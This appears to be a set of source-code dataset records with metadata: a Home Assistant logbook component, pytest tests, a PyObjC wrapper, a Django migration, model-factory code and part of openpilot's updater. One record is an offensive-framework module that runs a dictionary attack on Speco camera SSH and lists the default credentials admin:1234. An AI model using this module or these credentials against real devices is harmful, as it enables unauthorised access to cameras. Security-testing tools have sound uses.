datetime = dt_util.start_of_local_day()
start_day = dt_util.as_utc(datetime)
end_day = start_day + timedelta(days=1)
hass = request.app['hass']
def json_events():
"""Fetch events and generate JSON."""
return self.json(list(
_get_events(hass, self.config, start_day, end_day)))
response = yield from hass.async_add_job(json_events)
return response
class Entry(object):
"""A human readable version of the log."""
def __init__(self, when=None, name=None, message=None, domain=None,
entity_id=None):
"""Initialize the entry."""
self.when = when
self.name = name
self.message = message
self.domain = domain
self.entity_id = entity_id
def as_dict(self):
"""Convert entry to a dict to be used within JSON."""
return {
'when': self.when,
'name': self.name,
'message': self.message,
'domain': self.domain,
'entity_id': self.entity_id,
}
def humanify(events):
"""Generate a converted list of events into Entry objects.
Will try to group events if possible:
- if 2+ sensor updates in GROUP_BY_MINUTES, show last
- if home assistant stop and start happen in same minute call it restarted
"""
domain_prefixes = tuple('{}.'.format(dom) for dom in CONTINUOUS_DOMAINS)
# Group events in batches of GROUP_BY_MINUTES
for _, g_events in groupby(
events,
lambda event: event.time_fired.minute // GROUP_BY_MINUTES):
events_batch = list(g_events)
# Keep track of last sensor states
last_sensor_event = {}
# Group HA start/stop events
# Maps minute of event to 1: stop, 2: stop + start
start_stop_events = {}
# Process events
for event in events_batch:
if event.event_type == EVENT_STATE_CHANGED:
entity_id = event.data.get('entity_id')
if entity_id.startswith(domain_prefixes):
last_sensor_event[entity_id] = event
elif event.event_type == EVENT_HOMEASSISTANT_STOP:
if event.time_fired.minute in start_stop_events:
continue
start_stop_events[event.time_fired.minute] = 1
elif event.event_type == EVENT_HOMEASSISTANT_START:
if event.time_fired.minute not in start_stop_events:
continue
start_stop_events[event.time_fired.minute] = 2
# Yield entries
for event in events_batch:
if event.event_type == EVENT_STATE_CHANGED:
to_state = State.from_dict(event.data.get('new_state'))
domain = to_state.domain
# Skip all but the last sensor state
if domain in CONTINUOUS_DOMAINS and \
event != last_sensor_event[to_state.entity_id]:
continue
# Don't show continuous sensor value changes in the logbook
if domain in CONTINUOUS_DOMAINS and \
to_state.attributes.get('unit_of_measurement'):
continue
yield Entry(
event.time_fired,
name=to_state.name,
message=_entry_message_from_state(domain, to_state),
domain=domain,
entity_id=to_state.entity_id)
elif event.event_type == EVENT_HOMEASSISTANT_START:
if start_stop_events.get(event.time_fired.minute) == 2:
continue
yield Entry(
event.time_fired, "Home Assistant", "started",
domain=HA_DOMAIN)
elif event.event_type == EVENT_HOMEASSISTANT_STOP:
if start_stop_events.get(event.time_fired.minute) == 2:
action = "restarted"
else:
action = "stopped"
yield Entry(
event.time_fired, "Home Assistant", action,
domain=HA_DOMAIN)
elif event.event_type == EVENT_LOGBOOK_ENTRY:
domain = event.data.get(ATTR_DOMAIN)
entity_id = event.data.get(ATTR_ENTITY_ID)
if domain is None and entity_id is not None:
try:
domain = split_entity_id(str(entity_id))[0]
except IndexError:
pass
yield Entry(
event.time_fired, event.data.get(ATTR_NAME),
event.data.get(ATTR_MESSAGE), domain,
entity_id)
def _get_events(hass, config, start_day, end_day):
"""Get events for a period of time."""
from homeassistant.components.recorder.models import Events, States
from homeassistant.components.recorder.util import (
execute, session_scope)
with session_scope(hass=hass) as session:
query = session.query(Events).order_by(Events.time_fired) \
.outerjoin(States, (Events.event_id == States.event_id)) \
.filter(Events.event_type.in_(ALL_EVENT_TYPES)) \
.filter((Events.time_fired > start_day)
& (Events.time_fired < end_day)) \
.filter((States.last_updated == States.last_changed)
| (States.state_id.is_(None)))
events = execute(query)
return humanify(_exclude_events(events, config))
def _exclude_events(events, config):
"""Get list of filtered events."""
excluded_entities = []
excluded_domains = []
included_entities = []
included_domains = []
exclude = config.get(CONF_EXCLUDE)
if exclude:
excluded_entities = exclude[CONF_ENTITIES]
excluded_domains = exclude[CONF_DOMAINS]
include = config.get(CONF_INCLUDE)
if include:
included_entities = include[CONF_ENTITIES]
included_domains = include[CONF_DOMAINS]
filtered_events = []
for event in events:
domain, entity_id = None, None
if event.event_type == EVENT_STATE_CHANGED:
entity_id = event.data.get('entity_id')
if entity_id is None:
continue
# Do not report on new entities
if event.data.get('old_state') is None:
continue
new_state = event.data.get('new_state')
# Do not report on entity removal
if not new_state:
continue
attributes = new_state.get('attributes', {})
# If last_changed != last_updated only attributes have changed
# we do not report on that yet.
last_changed = new_state.get('last_changed')
last_updated = new_state.get('last_updated')
if last_changed != last_updated:
continue
domain = split_entity_id(entity_id)[0]
# Also filter auto groups.
if domain == 'group' and attributes.get('auto', False):
continue
# exclude entities which are customized hidden
hidden = attributes.get(ATTR_HIDDEN, False)
if hidden:
continue
elif event.event_type == EVENT_LOGBOOK_ENTRY:
domain = event.data.get(ATTR_DOMAIN)
entity_id = event.data.get(ATTR_ENTITY_ID)
if domain or entity_id:
# filter if only excluded is configured for this domain
if excluded_domains and domain in excluded_domains and \
not included_domains:
if (included_entities and entity_id not in included_entities) \
or not included_entities:
continue
# filter if only included is configured for this domain
elif not excluded_domains and included_domains and \
domain not in included_domains:
if (included_entities and entity_id not in included_entities) \
or not included_entities:
continue
# filter if included and excluded is configured for this domain
elif excluded_domains and included_domains and \
(domain not in included_domains or
domain in excluded_domains):
if (included_entities and entity_id not in included_entities) \
or not included_entities or domain in excluded_domains:
continue
# filter if only included is configured for this entity
elif not excluded_domains and not included_domains and \
included_entities and entity_id not in included_entities:
continue
# check if logbook entry is excluded for this entity
if entity_id in excluded_entities:
continue
filtered_events.append(event)
return filtered_events
# pylint: disable=too-many-return-statements
def _entry_message_from_state(domain, state):
"""Convert a state to a message for the logbook."""
# We pass domain in so we don't have to split entity_id again
if domain == 'device_tracker':
if state.state == STATE_NOT_HOME:
return 'is away'
return 'is at {}'.format(state.state)
elif domain == 'sun':
if state.state == sun.STATE_ABOVE_HORIZON:
return 'has risen'
return 'has set'
elif state.state == STATE_ON:
# Future: combine groups and its entity entries ?
return "turned on"
elif state.state == STATE_OFF:
return "turned off"
return "changed to {}".format(state.state)
| 34.397531
| 79
| 0.612375
|
import asyncio
import logging
from datetime import timedelta
from itertools import groupby
import voluptuous as vol
from homeassistant.core import callback
import homeassistant.helpers.config_validation as cv
import homeassistant.util.dt as dt_util
from homeassistant.components import sun
from homeassistant.components.http import HomeAssistantView
from homeassistant.const import (
EVENT_HOMEASSISTANT_START, EVENT_HOMEASSISTANT_STOP, EVENT_STATE_CHANGED,
STATE_NOT_HOME, STATE_OFF, STATE_ON, ATTR_HIDDEN, HTTP_BAD_REQUEST,
EVENT_LOGBOOK_ENTRY)
from homeassistant.core import State, split_entity_id, DOMAIN as HA_DOMAIN
DOMAIN = 'logbook'
DEPENDENCIES = ['recorder', 'frontend']
_LOGGER = logging.getLogger(__name__)
CONF_EXCLUDE = 'exclude'
CONF_INCLUDE = 'include'
CONF_ENTITIES = 'entities'
CONF_DOMAINS = 'domains'
CONFIG_SCHEMA = vol.Schema({
DOMAIN: vol.Schema({
CONF_EXCLUDE: vol.Schema({
vol.Optional(CONF_ENTITIES, default=[]): cv.entity_ids,
vol.Optional(CONF_DOMAINS, default=[]): vol.All(cv.ensure_list,
[cv.string])
}),
CONF_INCLUDE: vol.Schema({
vol.Optional(CONF_ENTITIES, default=[]): cv.entity_ids,
vol.Optional(CONF_DOMAINS, default=[]): vol.All(cv.ensure_list,
[cv.string])
})
}),
}, extra=vol.ALLOW_EXTRA)
ALL_EVENT_TYPES = [
EVENT_STATE_CHANGED, EVENT_LOGBOOK_ENTRY,
EVENT_HOMEASSISTANT_START, EVENT_HOMEASSISTANT_STOP
]
GROUP_BY_MINUTES = 15
CONTINUOUS_DOMAINS = ['proximity', 'sensor']
ATTR_NAME = 'name'
ATTR_MESSAGE = 'message'
ATTR_DOMAIN = 'domain'
ATTR_ENTITY_ID = 'entity_id'
LOG_MESSAGE_SCHEMA = vol.Schema({
vol.Required(ATTR_NAME): cv.string,
vol.Required(ATTR_MESSAGE): cv.template,
vol.Optional(ATTR_DOMAIN): cv.slug,
vol.Optional(ATTR_ENTITY_ID): cv.entity_id,
})
def log_entry(hass, name, message, domain=None, entity_id=None):
hass.add_job(async_log_entry, hass, name, message, domain, entity_id)
def async_log_entry(hass, name, message, domain=None, entity_id=None):
data = {
ATTR_NAME: name,
ATTR_MESSAGE: message
}
if domain is not None:
data[ATTR_DOMAIN] = domain
if entity_id is not None:
data[ATTR_ENTITY_ID] = entity_id
hass.bus.async_fire(EVENT_LOGBOOK_ENTRY, data)
@asyncio.coroutine
def setup(hass, config):
@callback
def log_message(service):
message = service.data[ATTR_MESSAGE]
name = service.data[ATTR_NAME]
domain = service.data.get(ATTR_DOMAIN)
entity_id = service.data.get(ATTR_ENTITY_ID)
message.hass = hass
message = message.async_render()
async_log_entry(hass, name, message, domain, entity_id)
hass.http.register_view(LogbookView(config.get(DOMAIN, {})))
yield from hass.components.frontend.async_register_built_in_panel(
'logbook', 'logbook', 'mdi:format-list-bulleted-type')
hass.services.async_register(
DOMAIN, 'log', log_message, schema=LOG_MESSAGE_SCHEMA)
return True
class LogbookView(HomeAssistantView):
url = '/api/logbook'
name = 'api:logbook'
extra_urls = ['/api/logbook/{datetime}']
def __init__(self, config):
self.config = config
@asyncio.coroutine
def get(self, request, datetime=None):
if datetime:
datetime = dt_util.parse_datetime(datetime)
if datetime is None:
return self.json_message('Invalid datetime', HTTP_BAD_REQUEST)
else:
datetime = dt_util.start_of_local_day()
start_day = dt_util.as_utc(datetime)
end_day = start_day + timedelta(days=1)
hass = request.app['hass']
def json_events():
return self.json(list(
_get_events(hass, self.config, start_day, end_day)))
response = yield from hass.async_add_job(json_events)
return response
class Entry(object):
def __init__(self, when=None, name=None, message=None, domain=None,
entity_id=None):
self.when = when
self.name = name
self.message = message
self.domain = domain
self.entity_id = entity_id
def as_dict(self):
return {
'when': self.when,
'name': self.name,
'message': self.message,
'domain': self.domain,
'entity_id': self.entity_id,
}
def humanify(events):
domain_prefixes = tuple('{}.'.format(dom) for dom in CONTINUOUS_DOMAINS)
for _, g_events in groupby(
events,
lambda event: event.time_fired.minute // GROUP_BY_MINUTES):
events_batch = list(g_events)
last_sensor_event = {}
start_stop_events = {}
for event in events_batch:
if event.event_type == EVENT_STATE_CHANGED:
entity_id = event.data.get('entity_id')
if entity_id.startswith(domain_prefixes):
last_sensor_event[entity_id] = event
elif event.event_type == EVENT_HOMEASSISTANT_STOP:
if event.time_fired.minute in start_stop_events:
continue
start_stop_events[event.time_fired.minute] = 1
elif event.event_type == EVENT_HOMEASSISTANT_START:
if event.time_fired.minute not in start_stop_events:
continue
start_stop_events[event.time_fired.minute] = 2
for event in events_batch:
if event.event_type == EVENT_STATE_CHANGED:
to_state = State.from_dict(event.data.get('new_state'))
domain = to_state.domain
if domain in CONTINUOUS_DOMAINS and \
event != last_sensor_event[to_state.entity_id]:
continue
if domain in CONTINUOUS_DOMAINS and \
to_state.attributes.get('unit_of_measurement'):
continue
yield Entry(
event.time_fired,
name=to_state.name,
message=_entry_message_from_state(domain, to_state),
domain=domain,
entity_id=to_state.entity_id)
elif event.event_type == EVENT_HOMEASSISTANT_START:
if start_stop_events.get(event.time_fired.minute) == 2:
continue
yield Entry(
event.time_fired, "Home Assistant", "started",
domain=HA_DOMAIN)
elif event.event_type == EVENT_HOMEASSISTANT_STOP:
if start_stop_events.get(event.time_fired.minute) == 2:
action = "restarted"
else:
action = "stopped"
yield Entry(
event.time_fired, "Home Assistant", action,
domain=HA_DOMAIN)
elif event.event_type == EVENT_LOGBOOK_ENTRY:
domain = event.data.get(ATTR_DOMAIN)
entity_id = event.data.get(ATTR_ENTITY_ID)
if domain is None and entity_id is not None:
try:
domain = split_entity_id(str(entity_id))[0]
except IndexError:
pass
yield Entry(
event.time_fired, event.data.get(ATTR_NAME),
event.data.get(ATTR_MESSAGE), domain,
entity_id)
def _get_events(hass, config, start_day, end_day):
from homeassistant.components.recorder.models import Events, States
from homeassistant.components.recorder.util import (
execute, session_scope)
with session_scope(hass=hass) as session:
query = session.query(Events).order_by(Events.time_fired) \
.outerjoin(States, (Events.event_id == States.event_id)) \
.filter(Events.event_type.in_(ALL_EVENT_TYPES)) \
.filter((Events.time_fired > start_day)
& (Events.time_fired < end_day)) \
.filter((States.last_updated == States.last_changed)
| (States.state_id.is_(None)))
events = execute(query)
return humanify(_exclude_events(events, config))
def _exclude_events(events, config):
excluded_entities = []
excluded_domains = []
included_entities = []
included_domains = []
exclude = config.get(CONF_EXCLUDE)
if exclude:
excluded_entities = exclude[CONF_ENTITIES]
excluded_domains = exclude[CONF_DOMAINS]
include = config.get(CONF_INCLUDE)
if include:
included_entities = include[CONF_ENTITIES]
included_domains = include[CONF_DOMAINS]
filtered_events = []
for event in events:
domain, entity_id = None, None
if event.event_type == EVENT_STATE_CHANGED:
entity_id = event.data.get('entity_id')
if entity_id is None:
continue
# Do not report on new entities
if event.data.get('old_state') is None:
continue
new_state = event.data.get('new_state')
# Do not report on entity removal
if not new_state:
continue
attributes = new_state.get('attributes', {})
# If last_changed != last_updated only attributes have changed
# we do not report on that yet.
last_changed = new_state.get('last_changed')
last_updated = new_state.get('last_updated')
if last_changed != last_updated:
continue
domain = split_entity_id(entity_id)[0]
# Also filter auto groups.
if domain == 'group' and attributes.get('auto', False):
continue
# exclude entities which are customized hidden
hidden = attributes.get(ATTR_HIDDEN, False)
if hidden:
continue
elif event.event_type == EVENT_LOGBOOK_ENTRY:
domain = event.data.get(ATTR_DOMAIN)
entity_id = event.data.get(ATTR_ENTITY_ID)
if domain or entity_id:
# filter if only excluded is configured for this domain
if excluded_domains and domain in excluded_domains and \
not included_domains:
if (included_entities and entity_id not in included_entities) \
or not included_entities:
continue
# filter if only included is configured for this domain
elif not excluded_domains and included_domains and \
domain not in included_domains:
if (included_entities and entity_id not in included_entities) \
or not included_entities:
continue
# filter if included and excluded is configured for this domain
elif excluded_domains and included_domains and \
(domain not in included_domains or
domain in excluded_domains):
if (included_entities and entity_id not in included_entities) \
or not included_entities or domain in excluded_domains:
continue
# filter if only included is configured for this entity
elif not excluded_domains and not included_domains and \
included_entities and entity_id not in included_entities:
continue
# check if logbook entry is excluded for this entity
if entity_id in excluded_entities:
continue
filtered_events.append(event)
return filtered_events
# pylint: disable=too-many-return-statements
def _entry_message_from_state(domain, state):
# We pass domain in so we don't have to split entity_id again
if domain == 'device_tracker':
if state.state == STATE_NOT_HOME:
return 'is away'
return 'is at {}'.format(state.state)
elif domain == 'sun':
if state.state == sun.STATE_ABOVE_HORIZON:
return 'has risen'
return 'has set'
elif state.state == STATE_ON:
return "turned on"
elif state.state == STATE_OFF:
return "turned off"
return "changed to {}".format(state.state)
| true
| true
|
1c3e8f5ccaa603cbef7cff415ec0d35ca6c9628a
| 829
|
py
|
Python
|
maza/modules/creds/cameras/speco/ssh_default_creds.py
|
ArturSpirin/maza
|
56ae6325c08bcedd22c57b9fe11b58f1b38314ca
|
[
"MIT"
] | 2
|
2020-02-06T20:24:31.000Z
|
2022-03-08T19:07:16.000Z
|
maza/modules/creds/cameras/speco/ssh_default_creds.py
|
ArturSpirin/maza
|
56ae6325c08bcedd22c57b9fe11b58f1b38314ca
|
[
"MIT"
] | null | null | null |
maza/modules/creds/cameras/speco/ssh_default_creds.py
|
ArturSpirin/maza
|
56ae6325c08bcedd22c57b9fe11b58f1b38314ca
|
[
"MIT"
] | null | null | null |
from maza.core.exploit import *
from maza.modules.creds.generic.ssh_default import Exploit as SSHDefault
class Exploit(SSHDefault):
__info__ = {
"name": "Speco Camera Default SSH Creds",
"description": "Module performs dictionary attack against Speco Camera SSH service. "
"If valid credentials are found, they are displayed to the user.",
"authors": (
"Marcin Bury <marcin[at]threat9.com>", # routersploit module
),
"devices": (
"Speco Camera",
)
}
target = OptIP("", "Target IPv4, IPv6 address or file with ip:port (file://)")
port = OptPort(22, "Target SSH port")
threads = OptInteger(1, "Number of threads")
defaults = OptWordlist("admin:1234", "User:Pass or file with default credentials (file://)")
| 36.043478
| 96
| 0.624849
|
from maza.core.exploit import *
from maza.modules.creds.generic.ssh_default import Exploit as SSHDefault
class Exploit(SSHDefault):
__info__ = {
"name": "Speco Camera Default SSH Creds",
"description": "Module performs dictionary attack against Speco Camera SSH service. "
"If valid credentials are found, they are displayed to the user.",
"authors": (
"Marcin Bury <marcin[at]threat9.com>",
),
"devices": (
"Speco Camera",
)
}
target = OptIP("", "Target IPv4, IPv6 address or file with ip:port (file://)")
port = OptPort(22, "Target SSH port")
threads = OptInteger(1, "Number of threads")
defaults = OptWordlist("admin:1234", "User:Pass or file with default credentials (file://)")
| true
| true
|
1c3e8f781c2f1741b461701bb73d3a842cced438
| 1,523
|
py
|
Python
|
tests/test_performance.py
|
manycoding/pytest-performance
|
f6473d0ac9c6ac58be9a13d2c9955810dc9962e4
|
[
"MIT"
] | 5
|
2020-09-14T12:18:55.000Z
|
2022-01-07T11:36:09.000Z
|
tests/test_performance.py
|
manycoding/pytest-performance
|
f6473d0ac9c6ac58be9a13d2c9955810dc9962e4
|
[
"MIT"
] | 1
|
2021-09-01T15:06:31.000Z
|
2021-09-01T15:06:31.000Z
|
tests/test_performance.py
|
manycoding/pytest-performance
|
f6473d0ac9c6ac58be9a13d2c9955810dc9962e4
|
[
"MIT"
] | 1
|
2021-03-11T15:20:05.000Z
|
2021-03-11T15:20:05.000Z
|
# -*- coding: utf-8 -*-
from _pytest.config import ExitCode
from pytest_performance import SKIP_FLAG
def test_performance(testdir):
# Given
testdir.makepyfile("""
def foo():
return 1
def test_sth(performance):
assert 1 == performance(foo, unit='s')
""")
# When
result = testdir.runpytest()
# Then
assert result.ret == ExitCode.OK
def test_performance_slow(testdir):
# Given
testdir.makepyfile("""
import pytest
import time
from pytest_performance import PerformanceException
def foo():
time.sleep(2)
return 1
def test_sth(performance):
with pytest.raises(PerformanceException):
performance(foo)
""")
# When
result = testdir.runpytest()
# Then
assert result.ret == ExitCode.OK
def test_performance_disable(testdir):
# Given
testdir.makepyfile("""
import pytest
import time
from pytest_performance import PerformanceException
def foo():
time.sleep(2)
return 1
def test_sth(performance):
pass
""")
# When
result = testdir.runpytest(SKIP_FLAG)
# Then
assert result.ret == ExitCode.OK
def test_performance_default(testdir):
# Given
testdir.makepyfile("""
def test_sth():
assert 1 == 1
""")
# When
result = testdir.runpytest()
# Then
assert result.ret == ExitCode.OK
| 18.802469
| 59
| 0.580433
|
from _pytest.config import ExitCode
from pytest_performance import SKIP_FLAG
def test_performance(testdir):
testdir.makepyfile("""
def foo():
return 1
def test_sth(performance):
assert 1 == performance(foo, unit='s')
""")
result = testdir.runpytest()
assert result.ret == ExitCode.OK
def test_performance_slow(testdir):
testdir.makepyfile("""
import pytest
import time
from pytest_performance import PerformanceException
def foo():
time.sleep(2)
return 1
def test_sth(performance):
with pytest.raises(PerformanceException):
performance(foo)
""")
result = testdir.runpytest()
assert result.ret == ExitCode.OK
def test_performance_disable(testdir):
testdir.makepyfile("""
import pytest
import time
from pytest_performance import PerformanceException
def foo():
time.sleep(2)
return 1
def test_sth(performance):
pass
""")
result = testdir.runpytest(SKIP_FLAG)
assert result.ret == ExitCode.OK
def test_performance_default(testdir):
testdir.makepyfile("""
def test_sth():
assert 1 == 1
""")
result = testdir.runpytest()
assert result.ret == ExitCode.OK
| true
| true
|
1c3e90d3f35f39a658602e8cef7ee1e6154cdd37
| 709
|
py
|
Python
|
Intents/__init__.py
|
EnjoyLifeFund/macHighSierra-py36-pkgs
|
5668b5785296b314ea1321057420bcd077dba9ea
|
[
"BSD-3-Clause",
"BSD-2-Clause",
"MIT"
] | 4
|
2019-03-11T18:05:49.000Z
|
2021-05-22T21:09:09.000Z
|
Intents/__init__.py
|
EnjoyLifeFund/macHighSierra-py36-pkgs
|
5668b5785296b314ea1321057420bcd077dba9ea
|
[
"BSD-3-Clause",
"BSD-2-Clause",
"MIT"
] | null | null | null |
Intents/__init__.py
|
EnjoyLifeFund/macHighSierra-py36-pkgs
|
5668b5785296b314ea1321057420bcd077dba9ea
|
[
"BSD-3-Clause",
"BSD-2-Clause",
"MIT"
] | 1
|
2019-03-18T18:53:36.000Z
|
2019-03-18T18:53:36.000Z
|
'''
Python mapping for the Intents framework.
This module does not contain docstrings for the wrapped code, check Apple's
documentation for details on how to use these functions and classes.
'''
import objc
import sys
import Foundation
from Intents import _metadata
from Intents._Intents import *
sys.modules['Intents'] = mod = objc.ObjCLazyModule(
"Intents",
"com.apple.Intents",
objc.pathForFramework("/System/Library/Frameworks/Intents.framework"),
_metadata.__dict__, None, {
'__doc__': __doc__,
'objc': objc,
'__path__': __path__,
'__loader__': globals().get('__loader__', None),
}, (Foundation,))
import sys
del sys.modules['Intents._metadata']
| 24.448276
| 75
| 0.705219
|
import objc
import sys
import Foundation
from Intents import _metadata
from Intents._Intents import *
sys.modules['Intents'] = mod = objc.ObjCLazyModule(
"Intents",
"com.apple.Intents",
objc.pathForFramework("/System/Library/Frameworks/Intents.framework"),
_metadata.__dict__, None, {
'__doc__': __doc__,
'objc': objc,
'__path__': __path__,
'__loader__': globals().get('__loader__', None),
}, (Foundation,))
import sys
del sys.modules['Intents._metadata']
| true
| true
|
1c3e91ca1ff386eb0061642315e5264fc880d898
| 609
|
py
|
Python
|
migrations/0002_auto_20180330_1541.py
|
j-ollivier/sonov-main
|
78123513fa73deae174363750fd64ab3e92a3d2a
|
[
"Apache-2.0"
] | null | null | null |
migrations/0002_auto_20180330_1541.py
|
j-ollivier/sonov-main
|
78123513fa73deae174363750fd64ab3e92a3d2a
|
[
"Apache-2.0"
] | null | null | null |
migrations/0002_auto_20180330_1541.py
|
j-ollivier/sonov-main
|
78123513fa73deae174363750fd64ab3e92a3d2a
|
[
"Apache-2.0"
] | null | null | null |
# Generated by Django 2.0.3 on 2018-03-30 13:41
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('main', '0001_initial'),
]
operations = [
migrations.AddField(
model_name='son',
name='audio_file',
field=models.FileField(default='', upload_to='static/main/audio'),
preserve_default=False,
),
migrations.AlterField(
model_name='son',
name='thumbnail',
field=models.ImageField(upload_to='static/main/thumbnail'),
),
]
| 24.36
| 78
| 0.576355
|
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('main', '0001_initial'),
]
operations = [
migrations.AddField(
model_name='son',
name='audio_file',
field=models.FileField(default='', upload_to='static/main/audio'),
preserve_default=False,
),
migrations.AlterField(
model_name='son',
name='thumbnail',
field=models.ImageField(upload_to='static/main/thumbnail'),
),
]
| true
| true
|
1c3e93fcc37764a327723d2663f9748a7fb8c3b8
| 427
|
py
|
Python
|
algorithms/mDSDI/src/models/model_factory.py
|
VinAIResearch/mDSDI
|
8ec49085d8389ab490ec633c3ae4bf66be085366
|
[
"Apache-2.0"
] | 9
|
2021-09-30T12:39:01.000Z
|
2022-03-17T07:49:59.000Z
|
algorithms/mDSDI/src/models/model_factory.py
|
VinAIResearch/mDSDI
|
8ec49085d8389ab490ec633c3ae4bf66be085366
|
[
"Apache-2.0"
] | null | null | null |
algorithms/mDSDI/src/models/model_factory.py
|
VinAIResearch/mDSDI
|
8ec49085d8389ab490ec633c3ae4bf66be085366
|
[
"Apache-2.0"
] | 1
|
2022-01-13T06:02:04.000Z
|
2022-01-13T06:02:04.000Z
|
from algorithms.mDSDI.src.models.mnistnet import MNIST_CNN, Color_MNIST_CNN
from algorithms.mDSDI.src.models.resnet import ResNet
nets_map = {"mnistnet": MNIST_CNN, "cmnistnet": Color_MNIST_CNN, "resnet50": ResNet}
def get_model(name):
if name not in nets_map:
raise ValueError("Name of model unknown %s" % name)
def get_model_fn(**kwargs):
return nets_map[name](**kwargs)
return get_model_fn
| 26.6875
| 84
| 0.728337
|
from algorithms.mDSDI.src.models.mnistnet import MNIST_CNN, Color_MNIST_CNN
from algorithms.mDSDI.src.models.resnet import ResNet
nets_map = {"mnistnet": MNIST_CNN, "cmnistnet": Color_MNIST_CNN, "resnet50": ResNet}
def get_model(name):
if name not in nets_map:
raise ValueError("Name of model unknown %s" % name)
def get_model_fn(**kwargs):
return nets_map[name](**kwargs)
return get_model_fn
| true
| true
|
1c3e9520fb0514245589ee15baf161677033977a
| 14,397
|
py
|
Python
|
selfdrive/updated.py
|
919bot/Tessa
|
9b48ff9020e8fb6992fc78271f2720fd19e01093
|
[
"MIT"
] | null | null | null |
selfdrive/updated.py
|
919bot/Tessa
|
9b48ff9020e8fb6992fc78271f2720fd19e01093
|
[
"MIT"
] | null | null | null |
selfdrive/updated.py
|
919bot/Tessa
|
9b48ff9020e8fb6992fc78271f2720fd19e01093
|
[
"MIT"
] | null | null | null |
#!/usr/bin/env python3
# Safe Update: A simple service that waits for network access and tries to
# update every 10 minutes. It's intended to make the OP update process more
# robust against Git repository corruption. This service DOES NOT try to fix
# an already-corrupt BASEDIR Git repo, only prevent it from happening.
#
# During normal operation, both onroad and offroad, the update process makes
# no changes to the BASEDIR install of OP. All update attempts are performed
# in a disposable staging area provided by OverlayFS. It assumes the deleter
# process provides enough disk space to carry out the process.
#
# If an update succeeds, a flag is set, and the update is swapped in at the
# next reboot. If an update is interrupted or otherwise fails, the OverlayFS
# upper layer and metadata can be discarded before trying again.
#
# The swap on boot is triggered by launch_chffrplus.sh
# gated on the existence of $FINALIZED/.overlay_consistent and also the
# existence and mtime of $BASEDIR/.overlay_init.
#
# Other than build byproducts, BASEDIR should not be modified while this
# service is running. Developers modifying code directly in BASEDIR should
# disable this service.
import os
import datetime
import subprocess
import psutil
from stat import S_ISREG, S_ISDIR, S_ISLNK, S_IMODE, ST_MODE, ST_INO, ST_UID, ST_GID, ST_ATIME, ST_MTIME
import shutil
import signal
from pathlib import Path
import fcntl
import threading
from cffi import FFI
import time
from common.basedir import BASEDIR
from common.params import Params
from selfdrive.swaglog import cloudlog
from common.op_params import opParams
from common.travis_checker import travis
STAGING_ROOT = "/data/safe_staging"
OVERLAY_UPPER = os.path.join(STAGING_ROOT, "upper")
OVERLAY_METADATA = os.path.join(STAGING_ROOT, "metadata")
OVERLAY_MERGED = os.path.join(STAGING_ROOT, "merged")
FINALIZED = os.path.join(STAGING_ROOT, "finalized")
NICE_LOW_PRIORITY = ["nice", "-n", "19"]
SHORT = os.getenv("SHORT") is not None
auto_update = opParams().get('autoUpdate', True) if not travis else False
# Workaround for the EON/termux build of Python having os.link removed.
ffi = FFI()
ffi.cdef("int link(const char *oldpath, const char *newpath);")
libc = ffi.dlopen(None)
class WaitTimeHelper:
ready_event = threading.Event()
shutdown = False
def __init__(self):
signal.signal(signal.SIGTERM, self.graceful_shutdown)
signal.signal(signal.SIGINT, self.graceful_shutdown)
signal.signal(signal.SIGHUP, self.update_now)
def graceful_shutdown(self, signum, frame):
# umount -f doesn't appear effective in avoiding "device busy" on EON,
# so don't actually die until the next convenient opportunity in main().
cloudlog.info("caught SIGINT/SIGTERM, dismounting overlay at next opportunity")
self.shutdown = True
self.ready_event.set()
def update_now(self, signum, frame):
cloudlog.info("caught SIGHUP, running update check immediately")
self.ready_event.set()
def wait_between_updates(ready_event):
ready_event.clear()
if SHORT:
ready_event.wait(timeout=10)
else:
ready_event.wait(timeout=60 * 10)
def link(src, dest):
# Workaround for the EON/termux build of Python having os.link removed.
return libc.link(src.encode(), dest.encode())
def run(cmd, cwd=None):
return subprocess.check_output(cmd, cwd=cwd, stderr=subprocess.STDOUT, encoding='utf8')
def remove_consistent_flag():
os.system("sync")
consistent_file = Path(os.path.join(FINALIZED, ".overlay_consistent"))
try:
consistent_file.unlink()
except FileNotFoundError:
pass
os.system("sync")
def set_consistent_flag():
consistent_file = Path(os.path.join(FINALIZED, ".overlay_consistent"))
os.system("sync")
consistent_file.touch()
os.system("sync")
def set_update_available_params(new_version=False):
params = Params()
t = datetime.datetime.now().isoformat()
params.put("LastUpdateTime", t.encode('utf8'))
if new_version:
try:
with open(os.path.join(FINALIZED, "RELEASES.md"), "rb") as f:
r = f.read()
r = r[:r.find(b'\n\n')] # Slice latest release notes
params.put("ReleaseNotes", r + b"\n")
except Exception:
params.put("ReleaseNotes", "")
params.put("UpdateAvailable", "1")
def dismount_ovfs():
if os.path.ismount(OVERLAY_MERGED):
cloudlog.error("unmounting existing overlay")
run(["umount", "-l", OVERLAY_MERGED])
def init_ovfs():
cloudlog.info("preparing new safe staging area")
Params().put("UpdateAvailable", "0")
remove_consistent_flag()
dismount_ovfs()
if os.path.isdir(STAGING_ROOT):
shutil.rmtree(STAGING_ROOT)
for dirname in [STAGING_ROOT, OVERLAY_UPPER, OVERLAY_METADATA, OVERLAY_MERGED, FINALIZED]:
os.mkdir(dirname, 0o755)
if not os.lstat(BASEDIR).st_dev == os.lstat(OVERLAY_MERGED).st_dev:
raise RuntimeError("base and overlay merge directories are on different filesystems; not valid for overlay FS!")
# Remove consistent flag from current BASEDIR so it's not copied over
if os.path.isfile(os.path.join(BASEDIR, ".overlay_consistent")):
os.remove(os.path.join(BASEDIR, ".overlay_consistent"))
# We sync FS object atimes (which EON doesn't use) and mtimes, but ctimes
# are outside user control. Make sure Git is set up to ignore system ctimes,
# because they change when we make hard links during finalize. Otherwise,
# there is a lot of unnecessary churn. This appears to be a common need on
# OSX as well: https://www.git-tower.com/blog/make-git-rebase-safe-on-osx/
run(["git", "config", "core.trustctime", "false"], BASEDIR)
# We are temporarily using copytree to copy the directory, which also changes
# inode numbers. Ignore those changes too.
run(["git", "config", "core.checkStat", "minimal"], BASEDIR)
# Leave a timestamped canary in BASEDIR to check at startup. The EON clock
# should be correct by the time we get here. If the init file disappears, or
# critical mtimes in BASEDIR are newer than .overlay_init, continue.sh can
# assume that BASEDIR has used for local development or otherwise modified,
# and skips the update activation attempt.
Path(os.path.join(BASEDIR, ".overlay_init")).touch()
overlay_opts = f"lowerdir={BASEDIR},upperdir={OVERLAY_UPPER},workdir={OVERLAY_METADATA}"
